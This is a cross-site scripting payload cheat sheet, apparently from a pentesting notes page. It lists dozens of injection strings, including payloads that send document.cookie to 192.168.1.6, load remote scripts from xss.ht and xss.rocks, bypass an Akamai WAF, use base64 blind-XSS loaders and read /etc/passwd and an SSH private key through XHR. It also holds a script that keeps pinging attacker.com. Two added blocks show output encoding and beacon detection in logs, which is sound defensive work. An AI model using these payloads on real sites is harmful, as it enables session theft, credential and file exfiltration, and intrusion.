XSS

<script>alert(1)</script>
<Script>alert(1)</Script>
<sCript>alert(document.domain)</sCript>
<script>alert(123);</script>
<script>alert("test");</script>
<script>alert(document.cookie)</script>
</script><script>alert(document.cookie)</script>
javascript:alert(document.cookie)
javascript:prompt(document.cookie)
'-alert(document.cookie)-'
</script><svg onload=alert(document.cookie)>
"onmouseover=alert(document.cookie)//
{{$on.constructor('alert(1)')()}}
<Script>alert(document.cookie)</Script>
<script>alert(document.cookie);</script>
<script>alert(document.domain)</script>
<script>new Image().src="http://192.168.1.6/?c="+document.cookie;</script>
<script>var i=new Image; i.src="http://192.168.1.6/?"+document.cookie;</script>
</script><script>alert(1)</script>
<img src="abc" onerror="alert(1)">
<img src="" onerror="alert(document.cookie)">
<img src='x' onerror='alert(document.cookie)' />
&lt;img src=0 onerror=alert(&#39;1&#39;)&gt;
&lt;img src=0 onerror=alert(document.cookie)&gt;
<svg/onload=alert(1)>
"><svg onload=alert(1)>
';alert('1');'
';alert('abc');'
<sc<script>ript>alert(1)</sc</script>ript>
<BODY ONLOAD=alert('1')>
<marquee onstart=alert(1)></marquee>
<audio src/onerror=alert(1)>
<audio src/onerror=prompt(123)>
<audio src/onerror=confirm(123)>
<script src="http://192.168.1.6/test.js" ></script>
<body onload=alert(123) >
<body onload=confirm(123) >
<body onload=prompt(123) >
--><svg/onload=alert(document.domain)>
--><body onload=alert(123) >
--><script>alert(1)</script>
--><img src=x onerror=alert(Gotcha)>
<iframe src='https://testforiframe.site/'>
"><iframe src='https://testforiframe.site/'>
"><script src="https://ee.xss.ht/"></script>
"><script>alert(document.domain)</script>
"><script>alert(document.domain + '\n' + "1")</script>
"><script>alert(document.domain + '\n' + "Name")</script>
"<img src='x' onerror='alert(10)' />"
https://brutelogic.com.br/poc.svg
http://xss.rocks/scriptlet.html
poc.svg = <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
"><script>alert(1)</script>
'or<script>alert(1)</script>
'or<img src=0 onerror=alert('1')>
<script <script>>alert('Gotcha')</script>
<audio src/onerror=alert('Gotcha')>
<iframe src=javascript:alert('Gotcha')>
<iframe src="javascript:alert(Gotcha)">
<img src=x onerror=alert(Gotcha)>
';alert(gotcha); //
<body onmouseover="print()">
<body onclick=print()>
<body onmessage=print()>
<iframe onload=print()></iframe>
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG """><SCRIPT>alert(document.cookie)</SCRIPT>"\>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<<SCRIPT>alert(document.cookie);//\<</SCRIPT>>
<iframe src=http://xss.rocks/scriptlet.html <
</script><script>alert(document.cookie);</script>
</TITLE><SCRIPT>alert(document.cookie);</SCRIPT>
<BODY ONLOAD=alert(document.cookie)>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
<script>'-alert(1)-'</script>
></select><img%20src=1%20onerror=alert(1)>
\"-alert(1)}//
<img src=1 onerror=print()>
"-top['al\x65rt']('sailay')-"
<pre id=p style=background:#000><svg onload='setInterval(n=>{for(o=t++,i=476;i--;o+=i%30?("0o"[c=0|(h=v=>(M=Math).hypot(i/30-8+3*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||".").fontcolor(c>2):"\n");p.innerHTML=o},t=1)'>
<img src="" onerror="innerHTML=decodeURIComponent.call`${location.hash}`" "="">
<img src="" onerror="location=/javascript:/.source+location" "="">
<img src="" onerror="window.onerror=alert;throw 1337" "="">
<img src="" onerror="alert&1par;1337&rpar;" "="">
<img src="" onerror="alert`1337`" "="">
"><img src=x onerror=alert(document.domain)>
"><script>alert(document.cookie)</script>
"><script>prompt(1)</script>
"><script>prompt(document.domain)</script>
"><script>prompt(document.cookie)</script>
"><svg><script>alert(1)</script>
?s="onerror="innerHTML=decodeURIComponet.call`${location.hash}`"#<img src onerror=alert(1337)>
?s="onerror="location=/javascript:/.source%2Blocation"&a=%0A+alert(1337)
?s="onerror="window.onerror=alert;throw 1337"
?s="onerror="alert%261par;1337%26rpar;"
?s="onerror="alert`1337`"
<img src="xxx" onerror="document.write('\<iframe src=file:///etc/passwd>\</iframe>')"/>
<link rel=attachment href="file:///etc/passwd">
<iframe src="http://attacker-ip/test.php?file=/etc/passwd">\</iframe>
<IMG sRC=X onerror=jaVaScRipT:alert`xss`>
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert`xss`%3E
<svg  xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
<svg><style> <script>alert(1)</script> </style></svg>
<math><style> <img src onerror=alert(2)> </style></math>

XSS list for manual testing (main cases, high success rate).

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on:

  • URL query, fragment & path;

  • all input fields.
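As an added example that is not part of the original cheat sheet: the six manual-test payloads above, run through context-specific output encoding to show that each one is inert in an HTML attribute, an inline-script string and a URL context once the data is encoded for that context. The function names and the about:blank fallback are assumptions.

```javascript
// Added example, not code from the original page: the six manual-test payloads
// above, run through context-specific output encoding to show each one is inert
// once the data is encoded for the context it lands in.
const PAYLOADS = [
  '"><img src onerror=alert(1)>',
  '"autofocus onfocus=alert(1)//',
  '</script><script>alert(1)</script>',
  "'-alert(1)-'",
  "\\'-alert(1)//",
  'javascript:alert(1)',
];

// Element text or quoted attribute: encode what can close the value or open a tag.
function encodeForHtml(s) {
  return s.replace(/[&<>"'\/]/g, c => `&#${c.charCodeAt(0)};`);
}

// JS string literal inside an inline <script>: every non-alphanumeric becomes
// \xHH or \uHHHH, so no quote, backslash or "</script>" reaches either parser.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return (code < 256 ? '\\x' : '\\u') + code.toString(16).padStart(code < 256 ? 2 : 4, '0');
  });
}

// href/src: allow only http(s) or site-relative URLs. Whitespace and control
// characters are stripped first so "java\tscript:" is not waved through.
function safeUrl(s) {
  const t = s.toLowerCase().replace(/[\x00-\x20]/g, '');
  return /^(https?:\/\/|\/)/.test(t) ? s : 'about:blank';   // assumed fallback
}

function render(p) {
  return {
    attr: `<input value="${encodeForHtml(p)}">`,
    script: `<script>var name = "${encodeForJsString(p)}";</script>`,
    href: `<a href="${encodeForHtml(safeUrl(p))}">link</a>`,
  };
}

// True when no payload can leave its context in any of the three renderings.
function allNeutralised() {
  return PAYLOADS.every(p => {
    const r = render(p);
    return /^<input value="[^"<>]*">$/.test(r.attr)
      && /^<script>var name = "[A-Za-z0-9\\]*";<\/script>$/.test(r.script)
      && /^<a href="(about:blank|https?:[^"]*)">link<\/a>$/.test(r.href);
  });
}
```

Encoding is per context: the attribute encoder alone would not protect the inline-script case (payload 3 only needs `</script>` to reach the HTML parser), which is why each sink gets its own function.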

A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>

A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here

Another one

"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

BlindXSS-Payloads: #Max Payload 5-7

  - '"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3Jgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vamVycnkuYnhzm9keS5hcHBlbmRDaGlsZChhKTs=&#61 onerror=eval(atob(this.id))>'
  - "'><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS57ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=&#61 onerror=eval(atob(this.id))>"

xss to lfi payload -

  1. x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open('GET','file:///etc/hosts');x.send();

  2. x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open('GET','file:///etc/passwd');x.send();

  3. get ssh private key:
     x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();

[Pinging the server down]

<script>
    let time = 500;
    setInterval(() => {
        // every 500 ms, request an image whose query string carries the elapsed time
        let img = document.createElement("img");
        img.src = `https://attacker.com/ping?time=${time}ms`;
        time += 500;
    }, 500);
</script>
<img src="https://attacker.com/delay">
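As an added example that is not part of the original page: detection logic for the 500 ms timing beacon the script above produces, run over constructed web-server access-log lines. The log format, the /ping path and the client addresses are assumptions; 203.0.113.7 models the browser running the script and 198.51.100.9 a client with irregular requests.

```javascript
// Added example, not code from the original page: detect the regular 500 ms
// beacon generated by the script above in constructed access-log lines.
// Log format, /ping path and client addresses are assumptions.
const LOG = `
2024-05-01T10:00:00.000Z 203.0.113.7 GET /delay 200
2024-05-01T10:00:00.510Z 203.0.113.7 GET /ping?time=500ms 200
2024-05-01T10:00:01.012Z 203.0.113.7 GET /ping?time=1000ms 200
2024-05-01T10:00:01.509Z 203.0.113.7 GET /ping?time=1500ms 200
2024-05-01T10:00:02.014Z 203.0.113.7 GET /ping?time=2000ms 200
2024-05-01T10:00:02.511Z 203.0.113.7 GET /ping?time=2500ms 200
2024-05-01T10:00:00.300Z 198.51.100.9 GET /ping?time=500ms 200
2024-05-01T10:00:03.900Z 198.51.100.9 GET /ping?time=500ms 200
2024-05-01T10:00:09.100Z 198.51.100.9 GET /ping?time=500ms 200
2024-05-01T10:00:10.000Z 198.51.100.9 GET /ping?time=500ms 200
`;

// "<iso-timestamp> <client> <method> <path?query> <status>"
const LINE = /^(\S+) (\S+) (\S+) (\S+) (\d+)$/;

function parseLog(text) {
  return text.trim().split('\n').flatMap(line => {
    const m = LINE.exec(line);
    if (!m) return [];                      // skip malformed lines
    return [{ ts: Date.parse(m[1]), client: m[2], method: m[3],
              path: m[4].split('?')[0], status: Number(m[5]) }];
  });
}

// Flag clients that hit `path` at least `minHits` times with every gap between
// consecutive hits within `tolerance` (a fraction) of the median gap: the
// script above fires every 500 ms regardless of user activity, a human does not.
function findBeacons(entries, { path = '/ping', minHits = 4, tolerance = 0.2 } = {}) {
  const byClient = new Map();
  for (const e of entries) {
    if (e.path !== path) continue;
    if (!byClient.has(e.client)) byClient.set(e.client, []);
    byClient.get(e.client).push(e.ts);
  }
  const beacons = [];
  for (const [client, times] of byClient) {
    if (times.length < minHits) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => t - times[i]);
    const median = [...gaps].sort((a, b) => a - b)[Math.floor(gaps.length / 2)];
    if (gaps.every(g => Math.abs(g - median) <= tolerance * median)) {
      beacons.push({ client, hits: times.length, intervalMs: median });
    }
  }
  return beacons;
}
```

The second client makes four requests to the same path but at irregular gaps, so it is not reported; only the fixed-interval client is.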

Last updated 9 months ago